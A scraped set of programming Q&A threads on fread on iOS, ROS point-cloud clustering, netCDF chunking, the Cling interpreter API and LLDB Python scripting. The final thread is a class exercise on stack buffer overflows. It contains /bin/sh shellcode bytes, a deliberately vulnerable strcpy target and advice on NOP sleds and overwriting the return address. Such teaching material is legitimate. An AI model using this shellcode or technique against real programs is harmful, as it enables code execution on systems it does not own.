fread failure issue (IOS 64bit environment) - ios

My problem is that, below code is working fine on another platforms, but on iOS 64bit it isn't.
details are in following code :
//FILE* f = fopen( .. ); // f is opened and already be used successfully.
//Size of target file is near 50mb
fseek(f, 0, SEEK_END);
// print ftell(f) -> 53394002
fseek(f, -1024, SEEK_END);
// print ftell(f) -> 53392978
fread(buf, 1, 1024, f); // returns 0.
ferror(f) // returns 3.
// print ftell(f) -> 53392978
fseek(f, 0, SEEK_END);
// print ftell(f) -> 53394002
when I tried to use fgetc() (for just test), result was same.
one of strange thing is that, return value 3 of ferror().
I heart the value means ESRCH("No such process"), and almost of documents what i found says the value is not related with file reading task.
Could give me some advise please?

The return value from ferror() is not the error number; it is zero for no error and non-zero for an error. If you want to know the error number, check errno. It would be better to show the full code including the tests on the return values from fseek(), and so on.
I can't reproduce your problem on my Mac. I created a big file which is the same size as yours:
$ ls -l big.file
-rw-r--r-- 1 jleffler staff 53394002 Oct 5 19:57 big.file
$
Code
#include <stdio.h>
int main(int argc, char **argv)
{
const char *filename = "big.file";
if (argc > 1)
filename = argv[1];
FILE *f = fopen(filename, "r");
if (f == 0)
{
perror(filename);
return 1;
}
if (fseek(f, 0, SEEK_END) != 0)
perror("fseek END 1");
printf("EOF %ld\n", ftell(f));
if (fseek(f, -1024, SEEK_END) != 0)
perror("fseek END 2");
printf("POS %ld\n", ftell(f));
char buf[1024];
size_t n = fread(buf, 1, 1024, f); // OP reports returns 0.
printf("N = %zu\n", n);
int r = ferror(f); // OP reports returns 3.
printf("r = %d\n", r);
printf("POS %ld\n", ftell(f));
if (fseek(f, 0, SEEK_END) != 0)
perror("fseek END 3");
printf("POS %ld\n", ftell(f));
fclose(f);
return 0;
}
This is not great code: it doesn't abandon ship on detecting errors (perror() returns after printing); it does not show what data is read so it can be compared with what's in the file (which was generated with a random data generator and then truncated to the precise length of your file with GNU truncate)
Compilation and run
$ gcc -O3 -g -std=c11 -Wall -Wextra -Werror bf19.c -o bf19
$ ./bf19
EOF 53394002
POS 53392978
N = 1024
r = 0
POS 53394002
POS 53394002
$
This indicates that the code works on my Mac running macOS Sierra 10.12 and GCC 6.2.0. Your problem, therefore, is in code that you've not shown. Adapt your code so it can be compiled and run and show a minimal test case like this one that reproduces the problem. For guidance on how to do it, read about:
MCVE (How to create a Minimal, Complete, and Verifiable Example?)
SSCCE (Short, Self-Contained, Correct Example)

Related

How to send cluster in separated node ros pcl

Hi i'm new in pointcloud library. I'm trying to show clustering result point on rviz or pcl viewer, and then show nothing. And i realize that my data show nothing too when i subcsribe and cout that. Hopefully can help my problem, thanks
This is my code for clustering and send node
void cloudReceive(const sensor_msgs::PointCloud2ConstPtr& inputMsg){
mutex_lock.lock();
pcl::fromROSMsg(*inputMsg, *inputCloud);
cout<<inputCloud<<endl;
pcl::search::KdTree<pcl::PointXYZRGB>::Ptr tree (new pcl::search::KdTree<pcl::PointXYZRGB>);
tree->setInputCloud(inputCloud);
std::vector<pcl::PointIndices> cluster_indices;
pcl::EuclideanClusterExtraction<pcl::PointXYZRGB> ec;
ec.setClusterTolerance(0.03);//2cm
ec.setMinClusterSize(200);//min points
ec.setMaxClusterSize(1000);//max points
ec.setSearchMethod(tree);
ec.setInputCloud(inputCloud);
ec.extract(cluster_indices);
if(cluster_indices.size() > 0){
std::vector<pcl::PointIndices>::const_iterator it;
int i = 0;
for (it = cluster_indices.begin(); it != cluster_indices.end(); ++it){
if(i >= 10)
break;
cloud_cluster[i]->points.clear();
std::vector<int>::const_iterator idx_it;
for (idx_it = it->indices.begin(); idx_it != it->indices.end(); idx_it++)
cloud_cluster[i]->points.push_back(inputCloud->points[*idx_it]);
cloud_cluster[i]->width = cloud_cluster[i]->points.size();
// cloud_cluster[i]->height = 1;
// cloud_cluster[i]->is_dense = true;
cout<<"PointCloud representing the Cluster: " << cloud_cluster[i]->points.size() << " data points"<<endl;
std::stringstream ss;
ss<<"cobaa_pipecom2_cluster_"<< i << ".pcd";
writer.write<pcl::PointXYZRGB> (ss.str(), *cloud_cluster[i], false);
pcl::toROSMsg(*cloud_cluster[i], outputMsg);
// cout<<"data = "<< outputMsg <<endl;
cloud_cluster[i]->header.frame_id = FRAME_ID;
pclpub[i++].publish(outputMsg);
// i++;
}
}
else
ROS_INFO_STREAM("0 clusters extracted\n");
}
And this one is the main
int main(int argc, char** argv){
for (int z = 0; z < 10; z++) {
// std::cout << " - clustering/" << z << std::endl;
cloud_cluster[z] = pcl::PointCloud<pcl::PointXYZRGB>::Ptr(new pcl::PointCloud<pcl::PointXYZRGB>);
cloud_cluster[z]->height = 1;
cloud_cluster[z]->is_dense = true;
// cloud_cluster[z]->header.frame_id = FRAME_ID;
}
ros::init(argc,argv,"clustering");
ros::NodeHandlePtr nh(new ros::NodeHandle());
pclsub = nh->subscribe("/pclsegmen",1,cloudReceive);
std::string pub_str("clustering/0");
for (int z = 0; z < 10; z++) {
pub_str[11] = z + 48;//48=0(ASCII)
// z++;
pclpub[z] = nh->advertise <sensor_msgs::PointCloud2> (pub_str, 1);
}
// pclpub = nh->advertise<sensor_msgs::PointCloud2>("/pclcluster",1);
ros::spin();
}
This isn't an exact answer, but I think it addresses your issue & may ease your debugging.
RViz can directly subscribe to a published point cloud, the one I'm assuming you're trying to see in the cloud_receive callback. If you set the Frame to whichever frame it's being published at, and add it from the available topics, you should see the points. (Easier than trying to rebroadcast it as different topics).
Also, I recommend looking at the rostopic command line tool. You can do rostopic list to check if it's being published, rostopic bw to see if it's really publishing the expected volume of data (ex bytes vs kilobytes vs megabytes), rostopic hz to see how frequently (if ever) it's publishing, and (briefly) rostopic echo to look at the data itself. (This is me assuming from your question it's more an issue with the data coming into your node).
If you're having trouble, not with data coming into the node, nor with the visualization of pointcloud data in general, but with the transformed data that's supposed to come out of the node, I would check that the clustering worked, & reduce your code moreso to just having 1 publisher publish something. You may be doing something weird. Like messing up your pointers. You could also turn on stronger compilation warnings for your node with -Wall -Wextra -Werror or step through the execution of it via gdb (launch-prefix="xterm -e gdb --args").
The solution is, i change the ASCII number into lexical_cast. Thanks for your response, i hope this can help other
for (int z = 0; z < CLOUD_QTD; z++) {
// pub_str[11] = z + 48;
std::string topicName = "/pclcluster/" + boost::lexical_cast<std::string>(z);
global::pub[z] = n.advertise <sensor_msgs::PointCloud2> (topicName, 1);
}

Corrupted netcdf output file related with chunk size or dimension naming

I noticed, that in the following program the created netcdf file is corrupted, i.e., executing ncdump -h out.nc produces errors.
#include <netcdf>
/**
* This file produces a corrupted nc output file.
* Compile with `g++ -std=c++11 -o test test.cpp -lnetcdf -lnetcdf_c++4
*/
// this is the first non-working
// chunk size. It does work with 1048576
// 1048576 is representable by exactly 20 bits.
#define CHUNK_SIZE 1048577
using namespace std;
using namespace netCDF;
using namespace netCDF::exceptions;
int main()
{
typedef std::vector<size_t> vs;
typedef std::vector<netCDF::NcDim> vd;
try
{
NcFile outFile = NcFile("out.nc", NcFile::replace);
// create the dimensions complying to the AMBER specs
NcDim frameDim = outFile.addDim("frame");
NcDim atomDim = outFile.addDim("atom");
NcDim spatialDim = outFile.addDim("spatial", 3);
NcDim radiusDim = outFile.addDim("radius",1);
// create the variables
NcVar coords = outFile.addVar("coordinates", ncFloat, vd({frameDim, atomDim, spatialDim}));
NcVar radii = outFile.addVar("radius", ncFloat, vd({frameDim, atomDim}));
// set up chunking
vs chunk_coords({1, CHUNK_SIZE, 3});
vs chunk_radii({1, CHUNK_SIZE, 1});
coords.setChunking(NcVar::nc_CHUNKED, chunk_coords);
radii.setChunking(NcVar::nc_CHUNKED, chunk_radii);
// set up compression
coords.setCompression(false, true, 1);
radii.setCompression(false, true, 1);
return 0;
}
catch(NcException& e)
{
return -1;
}
}
The out.nc becomes a valid and working netcdf file when ...
... the CHUNK_SIZE becomes less than 1048577
... CHUNKING is disabled
... the unused "radius" dimension is named differently or not added at all
Note, that the maximum number of working CHUNK_SIZE, 1048576 is the maximal integer number representable by 20 bits.
What causes this behaviour? It is easy to work around by renaming the radius dimension, but I am still curious in why this is in any way related to the chunking of HDF5/netcdf.

Cling API available?

How to use Cling in my app via API to interpret C++ code?
I expect it to provide terminal-like way of interaction without need to compile/run executable. Let's say i have hello world program:
void main() {
cout << "Hello world!" << endl;
}
I expect to have API to execute char* = (program code) and get char *output = "Hello world!". Thanks.
PS. Something similar to ch interpeter example:
/* File: embedch.c */
#include <stdio.h>
#include <embedch.h>
char *code = "\
int func(double x, int *a) { \
printf(\"x = %f\\n\", x); \
printf(\"a[1] in func=%d\\n\", a[1]);\
a[1] = 20; \
return 30; \
}";
int main () {
ChInterp_t interp;
double x = 10;
int a[] = {1, 2, 3, 4, 5}, retval;
Ch_Initialize(&interp, NULL);
Ch_AppendRunScript(interp,code);
Ch_CallFuncByName(interp, "func", &retval, x, a);
printf("a[1] in main=%d\n", a[1]);
printf("retval = %d\n", retval);
Ch_End(interp);
}
}
There is finally a better answer: example code! See https://github.com/root-project/cling/blob/master/tools/demo/cling-demo.cpp
And the answer to your question is: no. cling takes code and returns C++ values or objects, across compiled and interpreted code. It's not a "string in / string out" kinda thing. There's perl for that ;-) This is what code in, value out looks like:
// We could use a header, too...
interp.declare("int aGlobal;\n");
cling::Value res; // Will hold the result of the expression evaluation.
interp.process("aGlobal;", &res);
std::cout << "aGlobal is " << res.getAs<long long>() << '\n';
Apologies for the late reply!
Usually the way one does it is:
[cling$] #include "cling/Interpreter/Interpreter.h"
[cling$] const char* someCode = "int i = 123;"
[cling$] gCling->declare(someCode);
[cling$] i // You will have i declared:
(int) 123
The API is documented in: http://cling.web.cern.ch/cling/doxygen/classcling_1_1Interpreter.html
Of course you can create your own 'nested' interpreter in cling's runtime too. (See the doxygen link above)
I hope it helps and answers the question, more usage examples you can find under the test/ folder.
Vassil

LLDB Python access of iOS variables?

As part of debugging a problem that might be related to my UIVIews, I want to write a python script to run from LLDB. I had thought to extract all settings for a view in a breakpoint and all view children, to allow me to compare states. I checked out the WWDC video on the topic and then spent time reading things at lldb.llvm.org/scripting.html, and didn't find them very helpful. A web search for examples led to nothing substantially different from those.
My problem is that I'm trying to figure out how to access iOS variables at my breakpoint. The examples I've seen do things like convert numbers and mimic shell commands. Interesting stuff but not useful for my purposes. I've been reading my way through the help info with "script help(lldb.SBValue)" and the like, but it is slow going as the results are huge and it is not clear what the use patterns are. I feel like one decent example of how to traverse a few iOS objects would help me understand the system. Does anyone know of one or can share a snippet of code?
UPDATE:
I wrote this to help me track down a bug in my UIView use. I want to do a bit more work to refine this to see if I could show the whole view tree, but this was sufficient to solve my problem, so I'll put it here to save others some time.
import lldb
max_depth = 6
filters = {'_view':'UIView *', '_layer':'CALayer *', '_viewFlags':'struct'}
def print_value(var, depth, prefix):
""" print values and recurse """
global max_depth
local_depth = max_depth - depth
pad = ' ' * local_depth
name = var.GetName()
typ = str(var.GetType()).split('\n')[0].split('{')[0].split(':')[0].strip()
found = name in filters.keys() # only visit filter items children
if found:
found = (filters.get(name) == typ)
value = var.GetValue()
if value is None or str(value) == '0x00000000':
value = ''
else:
value = ' Val: %s' % value
if var.GetNumChildren() == 0 and var.IsInScope():
path = lldb.SBStream()
var.GetExpressionPath(path)
path = ' pathData: %s' % path.GetData()
else:
path = ''
print '^' * local_depth, prefix, ' Adr:', var.GetAddress(), ' Name:', name, ' Type:', typ, value, path
if var.GetNumChildren() > 0:
if local_depth < 2 or found:
print pad, var.GetNumChildren(), 'children, to depth', local_depth + 1
counter = 0
for subvar in var:
subprefix = '%d/%d' % (counter, var.GetNumChildren())
print_value(subvar, depth - 1, subprefix)
counter += 1
def printvh (debugger, command_line, result, dict):
""" print view hierarchy """
global max_depth
args = command_line.split()
if len(args) > 0:
var = lldb.frame.FindVariable(args[0])
depth = max_depth
if len(args) > 1:
depth = int(args[1])
max_depth = depth
print_value(var, depth, 'ROOT')
else:
print 'pass a variable name and optional depth'
And I added the following to my .lldbinit :
script import os, sys
# So that files in my dir takes precedence.
script sys.path[:0] = [os.path.expanduser("~/lldbpy")]
script import views
command script add -f views.printvh printvh
so that I can just type "printvh self 3" at the LLDB prompt.
Maybe this will help. Here's an example of how to dump simple local variables when a breakpoint is hit. I'm not displaying char* arrays correctly, I'm not sure how I should get the data for these to display it like "frame variable" would display it but I'll figure that out later when I have a free minute.
struct datastore {
int val1;
int val2;
struct {
int val3;
} subdata;
char *name;
};
int main (int argc, char **argv)
{
struct datastore data = {1, 5, {3}, "a string"};
return data.val2;
}
Current executable set to 'a.out' (x86_64).
(lldb) br se -l 13
Breakpoint created: 1: file ='a.c', line = 13, locations = 1
(lldb) br comm add -s python
Enter your Python command(s). Type 'DONE' to end.
> def printvar_or_children(var):
> if var.GetNumChildren() == 0 and var.IsInScope():
> path = lldb.SBStream()
> var.GetExpressionPath(path)
> print '%s: %s' % (path.GetData(), var.GetValue())
> else:
> for subvar in var:
> printvar_or_children(subvar)
>
> print 'variables visible at breakpoint %s' % bp_loc
> for var in frame.arguments:
> printvar_or_children(var)
> for var in frame.locals:
> printvar_or_children(var)
>
> DONE
(lldb) r
variables visible at breakpoint 1.1: where = a.out`main + 51 at a.c:13, address = 0x0000000100000f33, resolved, hit count = 1
argc: 1
*(*(argv)): '/'
data.val1: 1
data.val2: 5
data.subdata.val3: 3
*(data.name): 'a'
Process 84865 stopped
* thread #1: tid = 0x1f03, 0x0000000100000f33 a.out`main + 51 at a.c:13, stop reason = breakpoint 1.1
frame #0: 0x0000000100000f33 a.out`main + 51 at a.c:13
10 int main (int argc, char **argv)
11 {
12 struct datastore data = {1, 5, {3}, "a string"};
-> 13 return data.val2;
(lldb)
Tip - for sanity's sake I worked on the python over in a side text editor and pasted it into lldb as I experimented.
If you use the frame variable command in lldb to explore your variables at a given stop location, that's the same basic way that you can access them via the SBFrame that is provided to your breakpoint python command in the 'frame' object.
Hope that helps to get you started.
Did you try looking at the python LLDB formatting templates stored in:
XCode.app/Contents/SharedFrameworks/LLDB.framework/Resources/Python/lldb/formatters/objc

Intentional buffer overflow exploit program

I'm trying to figure out this problem for one of my comp sci classes, I've utilized every resource and still having issues, if someone could provide some insight, I'd greatly appreciate it.
I have this "target" I need to execute a execve(“/bin/sh”) with the buffer overflow exploit. In the overflow of buf[128], when executing the unsafe command strcpy, a pointer back into the buffer appears in the location where the system expects to find return address.
target.c
int bar(char *arg, char *out)
{
strcpy(out,arg);
return 0;
}
int foo(char *argv[])
{
char buf[128];
bar(argv[1], buf);
}
int main(int argc, char *argv[])
{
if (argc != 2)
{
fprintf(stderr, "target: argc != 2");
exit(EXIT_FAILURE);
}
foo(argv);
return 0;
}
exploit.c
#include "shellcode.h"
#define TARGET "/tmp/target1"
int main(void)
{
char *args[3];
char *env[1];
args[0] = TARGET; args[1] = "hi there"; args[2] = NULL;
env[0] = NULL;
if (0 > execve(TARGET, args, env))
fprintf(stderr, "execve failed.\n");
return 0;
}
shellcode.h
static char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
I understand I need to fill argv[1] with over 128 bytes, the bytes over 128 being the return address, which should be pointed back to the buffer so it executes the /bin/sh within. Is that correct thus far? Can someone provide the next step?
Thanks very much for any help.
Well, so you want the program to execute your shellcode. It's already in machine form, so it's ready to be executed by the system. You've stored it in a buffer. So, the question would be "How does the system know to execute my code?" More precisely, "How does the system know where to look for the next code to be executed?" The answer in this case is the return address you're talking about.
Basically, you're on the right track. Have you tried executing the code? One thing I've noticed when performing this type of exploit is that it's not an exact science. Sometimes, there are other things in memory that you don't expect to be there, so you have to increase the number of bytes you add into your buffer in order to correctly align the return address with where the system expects it to be.
I'm not a specialist in security, but I can tell you a few things that might help. One is that I usually include a 'NOP Sled' - essentially just a series of 0x90 bytes that don't do anything other than execute 'NOP' instructions on the processor. Another trick is to repeat the return address at the end of the buffer, so that if even one of them overwrites the return address on the stack, you'll have a successful return to where you want.
So, your buffer will look like this:
| NOP SLED | SHELLCODE | REPEATED RETURN ADDRESS |
(Note: These aren't my ideas, I got them from Hacking: The Art of Exploitation, by Jon Erickson. I recommend this book if you're interested in learning more about this).
To calculate the address, you can use something similar to the following:
unsigned long sp(void)
{ __asm__("movl %esp, %eax");} // returns the address of the stack pointer
int main(int argc, char *argv[])
{
int i, offset;
long esp, ret, *addr_ptr;
char* buffer;
offset = 0;
esp = sp();
ret = esp - offset;
}
Now, ret will hold the return address you want to return to, assuming that you allocate buffer to be on the heap.

Resources